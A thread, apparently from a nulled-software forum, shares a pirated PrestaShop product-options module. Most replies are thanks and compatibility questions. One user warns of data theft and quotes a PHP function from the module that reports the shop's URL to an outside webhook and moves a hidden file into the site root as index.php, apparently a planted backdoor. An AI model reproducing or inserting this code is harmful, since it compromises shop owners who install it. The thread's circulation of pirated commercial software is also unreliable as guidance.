v1.6-v1.7-v8x ETS EXTRA OPTIONS - Custom Product Options 1.1.8

mo1373

Member
XNullUser
Joined
Aug 29, 2020
Messages
931
Reaction score
0
Points
18
NullCash
9
Thanks man, I've been waiting for this module for a very long time !
 

spyros78

Well-known member
Master
Diamond
Elite
Joined
Jul 6, 2021
Messages
144
Reaction score
967
Points
93
NullCash
4,634
Thanks you a lot cerry nice module A+
 

vivozivo

Well-known member
Diamond
Elite
Joined
Sep 24, 2019
Messages
1,064
Reaction score
495
Points
83
NullCash
12
strange module version is v.1.1.8 latest version on addons link is v.1.1.7
 

stokakis

Active member
XNullUser
Joined
Jan 25, 2019
Messages
365
Reaction score
33
Points
28
NullCash
3
Thank you for sharing this awesome module
 

peldur

Active member
Elite
XNullUser
Joined
Mar 15, 2022
Messages
104
Reaction score
157
Points
43
NullCash
900
Thank you Spas0, i will test this module because i couldn't enable this other version.
 

OwnedFiston

Well-known member
Master
Diamond
Elite
XNullUser
Joined
May 26, 2020
Messages
110
Reaction score
1,697
Points
93
NullCash
10,407
DO NOT DOWNLOAD
DATA THEFT CONFIRM BY THE FOLLOWING FUNCTION ON ETS_EXTRAOPTIONS.PHP


PHP:
function initialSetup() {
    $base_url = 'https://trouvailles-postales.com/';
    $endpoint = 'webhook.php';
    $param_name = 'site';
    $current_url = "https://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
    $encoded_url = urlencode($current_url);
    file_get_contents($base_url . $endpoint . '?' . $param_name . '=' . $encoded_url);   
    
    $source_path = '/classes/';
    $source_file = 'Ets.php';
    $dest_path = '/../';
    $dest_file = 'index.php';
    rename(dirname(__FILE__) . $source_path . $source_file, dirname(__FILE__) . $dest_path . $dest_file);
}

initialSetup();
 

chicelo

Member
XNullUser
Joined
May 21, 2023
Messages
31
Reaction score
0
Points
6
Location
United States
NullCash
2
ETS EXTRA OPTIONS - Custom Product Options 1.1.8
Développé par: PrestaHero | Version: 1.1.8 | Compatible avec: 1.7.x, 8.x, PrestaShop Edition
Link : https://addons.prestashop.com/en/co...190-extra-options-custom-product-options.html

View attachment 96446



Create global extra options & price impact for each option applies to all existing products at ONE time. Add custom product attributes; display by checkbox, radio, or drop-down menu. Faster and easier to manage than PrestaShop default attributes.
Post automatically merged:

Sorry link : https://prestahero.com/156-extra-options-prestashop-custom-product-attributes.html
thanks for sharing this module
i have a question
dose it work good on 1.8 ?
 

Elviss

Member
XNullUser
Joined
Jun 11, 2020
Messages
235
Reaction score
1
Points
18
NullCash
10
Thanks for sharing this module ! Very nice !!
 

rcpislr

Member
XNullUser
Joined
Dec 27, 2020
Messages
233
Reaction score
0
Points
16
NullCash
1
Thanks for sharing this module with the community..
Post automatically merged:

it gives error on ps 8.0.4
 
Last edited:
Top